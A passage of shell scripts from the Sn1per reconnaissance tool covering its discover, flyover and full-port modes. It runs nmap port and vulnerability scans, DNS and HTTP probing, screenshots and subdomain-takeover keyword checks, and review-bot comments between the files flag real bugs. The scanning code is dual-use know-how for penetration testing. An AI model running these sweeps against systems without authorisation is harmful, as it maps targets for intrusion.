mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
fi
OUT_FILE="$(echo $TARGET | tr / -)"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$OUT_FILE-$MODE.txt 2> /dev/null
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -t $TARGET -m $MODE --noreport $args | tee $LOOT_DIR/output/sniper-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ /\\"
echo -e "$OKRED Sn1per by @xer0dayz @Sn1perSecurity \ \\"
echo -e "$OKRED https://sn1persecurity.com \ \\"
echo -e "$OKRED ___ / \\"
echo -e "$OKRED \ \\"
echo -e "$OKRED === > [ \\"
echo -e "$OKRED / \ \\"
echo -e "$OKRED \ / /"
echo -e "$OKRED === > [ /"
echo -e "$OKRED / /"
echo -e "$OKRED ___ \ /"
echo -e "$OKRED / /"
echo -e "$OKRED ____ / /"
echo -e "$OKRED \/$RESET"
echo ""
OUT_FILE=$(echo $TARGET | tr / -)
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING PING DISCOVERY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -n -sP $TARGET | tee $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt
cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping.txt 2> /dev/null | grep "scan report" | awk '{print $5}' > $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -n -v -p $QUICK_PORTS $NMAP_OPTIONS -sS $TARGET -Pn 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt 2>/dev/null
cat $LOOT_DIR/ips/sniper-$OUT_FILE-tcp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING UDP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap -n -v -p $DEFAULT_UDP_PORTS $NMAP_OPTIONS -sU -Pn $TARGET 2> /dev/null | grep "open port" | tee $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt 2>/dev/null
cat $LOOT_DIR/ips/sniper-$OUT_FILE-udp.txt | grep open | grep on | awk '{print $6}' > $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED CURRENT TARGETS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/ips/sniper-$OUT_FILE-ping-sorted.txt $LOOT_DIR/ips/sniper-$OUT_FILE-tcpips.txt $LOOT_DIR/ips/sniper-$OUT_FILE-udpips.txt 2> /dev/null > $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt
sort -u $LOOT_DIR/ips/sniper-$OUT_FILE-ips-unsorted.txt > $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
cat $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt
echo ""
echo -e "$OKRED[+]$RESET Target list saved to $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt "
echo -e "$OKRED[i] To scan all IP's, use sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE $RESET"
source $INSTALL_DIR/modes/sc0pe.sh
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED SCAN COMPLETE! $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE
exit
fi
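Review bot: the final `sniper -f $LOOT_DIR/ips/discover-$OUT_FILE-sorted.txt -m flyover -w $WORKSPACE` runs whether or not a workspace was given; with `WORKSPACE` empty the command ends in a bare `-w`, so the follow-up flyover is launched with a dangling option, and the hint printed just before it (`To scan all IP's, use sniper -f ... -m flyover`) tells the user to do by hand what the script then does anyway. Guard the call with `if [[ ! -z "$WORKSPACE" ]]` (or omit `-w` when empty), and move the "Finished Sn1per scan" notification after the flyover instead of before it. Minor: `nmap -n -sP` is the old spelling of `-sn`; and the TCP/UDP sweeps parse the human-readable verbose lines (`grep "open port"` then `awk '{print $6}'` on "Discovered open port N/tcp on IP"), which only exist because of `-v` and are not a stable format. `-oG -` is the output meant to be parsed. The `mkdir $LOOT_DIR/scans` also only happens in the workspace branch, so the `tasks.txt` append fails silently without `-w`.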

165
modes/flyover.sh Normal file

@@ -0,0 +1,165 @@
# FLYOVER MODE ######################################################################################################
if [[ "$MODE" = "flyover" ]]; then
if [[ -z "$FILE" ]]; then
logo
echo "You need to specify a list of targets (ie. -f <targets.txt>) to scan."
exit
fi
if [[ "$REPORT" = "1" ]]; then
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
WORKSPACE_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $WORKSPACE_DIR 2> /dev/null
mkdir $WORKSPACE_DIR/domains 2> /dev/null
mkdir $WORKSPACE_DIR/screenshots 2> /dev/null
mkdir $WORKSPACE_DIR/nmap 2> /dev/null
mkdir $WORKSPACE_DIR/notes 2> /dev/null
mkdir $WORKSPACE_DIR/reports 2> /dev/null
mkdir $WORKSPACE_DIR/output 2> /dev/null
fi
args="$args -f $FILE -m flyover --noreport --noloot"
echo -e "$OKRED "
echo -e "$OKRED . . "
echo -e "$OKRED // "'\\\\ '
echo -e "$OKRED // "'\\\\ '
echo -e "$OKRED // "'\\\\ '
echo -e "$OKRED // _._ "'\\\\ '
echo -e "$OKRED .---. .//|"'\\\\. .---. '
echo -e "$OKRED ________ / .-. \_________..-~ _.-._ ~-..________ / .-. \_________ -sr "
echo -e "$OKRED \ ~-~ / /H- \`-=.___.=-' -H\ \ ~-~ / "
echo -e "$OKRED ~~~ / H [H] H \ ~~~ "
echo -e "$OKRED / _H_ _H_ _H_ \ "
echo -e "$OKRED UUU UUU UUU "
echo -e "$OKRED "
echo -e "$RESET"
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/$WORKSPACE-$MODE.txt
sniper $args | tee $WORKSPACE_DIR/output/sniper-$WORKSPACE-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
echo "$FILE $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -f $FILE -m $MODE --noreport $args" >> $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
args=""
cp $LOOT_DIR/nmap/livehosts-sorted.txt $LOOT_DIR/nmap/livehosts-sorted.old 2> /dev/null
i=1
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} Collecting DNS, ports, HTTP info and screenshots in background.${RESET}"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} All collected info will be saved to ${OKRED}${LOOT_DIR}${RESET}"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} FLYOVER_MAX_HOSTS=$FLYOVER_MAX_HOSTS ${RESET}"
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]${RESET} FLYOVER_DELAY=$FLYOVER_DELAY ${RESET}"
for HOST in `cat $FILE`; do
TARGET="$HOST"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
touch $LOOT_DIR/scans/$TARGET-$MODE.txt 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
echo "sniper -t $TARGET -m $MODE $args" >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKBLUE[*]$RESET SCANNING:$RESET $OKBLUE[$RESET${OKGREEN}${TARGET}${RESET}$OKBLUE]$RESET"
dig all +short $TARGET 2> /dev/null > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
dig all +short -x $TARGET 2> /dev/null >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null &
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-http-$TARGET.txt & 2> /dev/null
wget -qO- -T 1 --connect-timeout=5 --read-timeout=5 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' 2> /dev/null > $LOOT_DIR/web/title-https-$TARGET.txt & 2> /dev/null
curl --connect-timeout 5 -I -s -R --insecure http://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -I -s -R --insecure https://$TARGET 2> /dev/null > $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null &
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null &
webtech -u http://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-http.txt 2> /dev/null &
webtech -u https://$TARGET 2> /dev/null | grep \- 2> /dev/null | cut -d- -f2- 2> /dev/null > $LOOT_DIR/web/webtech-$TARGET-https.txt 2> /dev/null &
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
nmap -sS -p $QUICK_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &
WEBHOST=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null | egrep "80|443" | grep open | wc -l 2> /dev/null)
if [[ "$WEBHOST" -gt "0" ]]; then
echo "$TARGET" >> $LOOT_DIR/web/webhosts-unsorted.txt 2> /dev/null
fi
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "anima|bitly|wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" 2>/dev/null | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null & 2> /dev/null
if [[ $CUTYCAPT = "1" ]]; then
if [[ $DISTRO == "blackarch" ]]; then
/bin/CutyCapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null &
/bin/CutyCapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null &
else
cutycapt --url=http://$TARGET:80 --out=$LOOT_DIR/screenshots/$TARGET-port80.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
cutycapt --url=https://$TARGET:443 --out=$LOOT_DIR/screenshots/$TARGET-port443.jpg --insecure --max-wait=5000 2> /dev/null > /dev/null &
fi
fi
if [[ $WEBSCREENSHOT = "1" ]]; then
cd $LOOT_DIR
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:80 2> /dev/null > /dev/null &
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:443 2> /dev/null > /dev/null &
fi
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
echo "$TARGET" >> $LOOT_DIR/domains/targets-all-presorted.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt 2> /dev/null
RUNNING_TASKS=$(wc -l $LOOT_DIR/scans/tasks-running.txt 2> /dev/null)
i=$((i+1))
if [[ "$i" -gt "$FLYOVER_MAX_HOSTS" ]]; then
i=1
sleep $FLYOVER_DELAY
fi
done
sleep $FLYOVER_DELAY
sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
sort -u $LOOT_DIR/domains/targets-all-presorted.txt 2> /dev/null > $LOOT_DIR/domains/targets-all-sorted.txt
rm -f $INSTALL_DIR/wget-log* 2> /dev/null
killall webtech 2> /dev/null
rm -f $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
for TARGET in `cat $LOOT_DIR/domains/targets-all-sorted.txt`; do
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
done
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
diff $LOOT_DIR/nmap/livehosts-sorted.old $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.diff 2> /dev/null
if [[ -s "$LOOT_DIR/nmap/livehosts-sorted.diff" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Host status change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/livehosts-sorted.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Host status change detected on $WORKSPACE (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/livehosts-sorted.diff"
fi
fi
for a in `cat $LOOT_DIR/domains/targets-all-sorted.txt 2> /dev/null`
do
diff $LOOT_DIR/nmap/ports-$a.old $LOOT_DIR/nmap/ports-$a.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$a.diff 2> /dev/null
if [[ -s "$LOOT_DIR/nmap/ports-$a.diff" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$a.diff | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $a (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$a.diff"
fi
fi
done
sed -i -E 's/,//g' $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
rm -f $LOOT_DIR/scans/running_${WORKSPACE}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $FILE [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
if [[ "$LOOT" = "1" ]]; then
loot
fi
fi
exit
fi
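Review bot: `sort -u LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt` is missing the `$` on the input path, so it reads a non-existent relative file, the error is discarded, and `ips-all-sorted.txt` is truncated to empty on every run (the later `sed -i -E 's/,//g'` then operates on an empty file). Two related problems in the per-host loop: the port scan is backgrounded (`nmap -sS -p $QUICK_PORTS $TARGET ... > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null &`) and the very next line reads that file to set `WEBHOST`, so `webhosts-unsorted.txt` reflects the previous run at best; and in `... | perl ... > $LOOT_DIR/web/title-http-$TARGET.txt & 2> /dev/null` the `&` ends the command before the redirect, so stderr is not redirected (same pattern on the takeover-check line). Put the redirects before `&` and do the WEBHOST classification in the post-loop pass after `sleep $FLYOVER_DELAY`, where the XML files are read anyway. `egrep "80|443"` on the text output also matches 8080, 4433 and version strings; match `^(80|443)/tcp +open` instead. Lastly, the screenshot step still calls `python2 $INSTALL_DIR/bin/webscreenshot.py`, which fails on hosts with only python3, and the `2> /dev/null > /dev/null &` hides that failure.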

112
modes/fullportonly.sh Normal file

@@ -0,0 +1,112 @@
# FULLPORTONLY MODE
if [[ "$MODE" = "fullportonly" ]]; then
if [[ "$REPORT" = "1" ]]; then
args="-t $TARGET"
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR [$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m fullportonly"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport " >> $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
logo
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
echo "$TARGET" >> $LOOT_DIR/domains/targets.txt
if [[ -f "/usr/share/sniper/pro/.portscanner.conf" ]]; then
source /usr/share/sniper/pro/.portscanner.conf
fi
if [[ -z "$PORT" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -oX $LOOT_DIR/nmap/nmap-$TARGET.xml -p $FULL_PORTSCAN_PORTS $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
else
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED PERFORMING TCP PORT SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
nmap $NMAP_OPTIONS -sU -sS --script=/usr/share/nmap/scripts/vulners -p $PORT -oX $LOOT_DIR/nmap/nmap-$TARGET-tcp-port$PORT.xml $TARGET | tee $LOOT_DIR/nmap/nmap-$TARGET
sed -r "s/</\&lh\;/g" $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null > $LOOT_DIR/nmap/nmap-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/nmap-$TARGET 2> /dev/null
xsltproc $INSTALL_DIR/bin/nmap-bootstrap.xsl $LOOT_DIR/nmap/nmap-$TARGET.xml -o $LOOT_DIR/nmap/nmapreport-$TARGET.html 2> /dev/null
fi
cp -f $LOOT_DIR/nmap/nmapreport-$TARGET.html $LOOT_DIR/nmap/nmapreport-$TARGET-`date +"%Y-%m-%d-%H-%M"`.html 2> /dev/null
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
rm -f $LOOT_DIR/scans/running_${TARGET}_${MODE}.txt 2> /dev/null
ls -lh $LOOT_DIR/scans/running_*.txt 2> /dev/null | wc -l 2> /dev/null > $LOOT_DIR/scans/tasks-running.txt
HOST_UP=$(cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2> /dev/null | grep "host up" 2> /dev/null)
if [[ ${#HOST_UP} -ge 2 ]]; then
echo "$TARGET" >> $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null
fi
sort -u $LOOT_DIR/nmap/livehosts-unsorted.txt 2> /dev/null > $LOOT_DIR/nmap/livehosts-sorted.txt 2> /dev/null
mv -f $LOOT_DIR/nmap/ports-$TARGET.txt $LOOT_DIR/nmap/ports-$TARGET.old 2> /dev/null
for PORT in `cat $LOOT_DIR/nmap/nmap-$TARGET.xml $LOOT_DIR/nmap/nmap-$TARGET-*.xml 2>/dev/null | egrep 'state="open"' | cut -d' ' -f3 | cut -d\" -f2 | sort -u | grep '[[:digit:]]'`; do
echo "$PORT " >> $LOOT_DIR/nmap/ports-$TARGET.txt
done
diff $LOOT_DIR/nmap/ports-$TARGET.old $LOOT_DIR/nmap/ports-$TARGET.txt 2> /dev/null > $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt 2>/dev/null | egrep "MAC Address:" | awk '{print $3 " " $4 " " $5 " " $6}' > $LOOT_DIR/nmap/macaddress-$TARGET.txt 2> /dev/null
cat $LOOT_DIR/nmap/nmap-$TARGET.txt $LOOT_DIR/nmap/nmap-$TARGET-*.txt $LOOT_DIR/output/nmap-$TARGET-*.txt 2>/dev/null | egrep "OS details:|OS guesses:" | cut -d\: -f2 | sed 's/,//g' | head -c50 - > $LOOT_DIR/nmap/osfingerprint-$TARGET.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET.txt"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/nmap-$TARGET-udp.txt"
fi
if [[ -s "$LOOT_DIR/nmap/ports-$TARGET.diff" ]]; then
echo "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
cat $LOOT_DIR/nmap/ports-$TARGET.diff 2> /dev/null | egrep "<|>" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
if [[ "$SLACK_NOTIFICATIONS_NMAP_DIFF" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Port change detected on $TARGET (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/ports-$TARGET.diff"
fi
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
